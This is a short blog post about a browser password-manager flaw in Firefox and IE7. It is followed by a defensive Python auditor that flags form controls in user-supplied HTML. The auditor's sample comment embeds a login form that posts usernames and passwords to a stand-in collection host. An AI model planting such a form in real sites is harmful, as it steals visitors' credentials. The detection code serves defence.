Whoa! Even Firefox Isn't Safe!
A new vulnerability, complete with exploit in the wild, has been logged against Firefox (the same exploit works against IE7).
This is a really bad one: Whenever you visit a site containing user-supplied HTML (such as, well, this one, for example), a page can be crafted to slurp your credentials for that site -- invisibly -- and send them off to wherever the phisher desires.
For example, if you have an account on Blogger, I may have already stolen your credentials if you click anywhere on this page! (I didn't. Honest.)
Basically, the exploit fools Firefox's (or IE's) password manager into saying "Hey, I know the site this page is from, and we have a login for it, so what harm?"
Plenty, as it turns out.
Mad props to Slashdot for publicizing this one.
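
On the site operator's side, one mitigation is to refuse user-supplied HTML that carries form controls before it is published. The sketch below is an added example, not code from this post or from either browser; it assumes the autofill is triggered by login fields inside the user's markup, and the hosts `blog.example` and `collector.example`, the sample comment, and all function names are constructed for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse


class FormControlAudit(HTMLParser):
    """Records form-related elements found in untrusted, user-supplied HTML."""

    def __init__(self, site_host):
        super().__init__(convert_charrefs=True)
        self.site_host = site_host.lower()
        self.findings = []

    def handle_starttag(self, tag, attrs):
        # HTMLParser already lower-cases tag and attribute names.
        a = {name: (value or "") for name, value in attrs}
        if tag == "form":
            host = (urlparse(a.get("action", "").strip()).hostname or "").lower()
            if host and host != self.site_host:
                self.findings.append(("offsite-form-action", host))
            else:
                # A same-site form is still flagged: the password manager
                # trusts the page's site, so any user-authored form is a risk.
                self.findings.append(("form", a.get("action", "")))
        elif tag == "input" and a.get("type", "text").lower() == "password":
            self.findings.append(("password-input", a.get("name", "")))
        elif tag in ("input", "button") and a.get("formaction"):
            self.findings.append(("formaction", a["formaction"]))


def audit_user_html(markup, site_host):
    """Return a list of (kind, detail) findings for one piece of user markup."""
    audit = FormControlAudit(site_host)
    audit.feed(markup)
    audit.close()
    return audit.findings


def is_safe_to_publish(markup, site_host):
    """True only when the markup contains no form controls at all."""
    return not audit_user_html(markup, site_host)


# Constructed sample input: a comment carrying a login form aimed off-site.
SAMPLE_COMMENT = (
    '<p>Nice post!</p>'
    '<FORM action="https://collector.example/c" method="post">'
    '<input name="user"><input TYPE="password" name="pass"></FORM>'
)

if __name__ == "__main__":
    print(audit_user_html(SAMPLE_COMMENT, "blog.example"))
```

Rejecting the markup outright is safer than trying to rewrite it, and an allow-list sanitizer that never permits `form`, `input` or `button` in user content achieves the same result.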
    



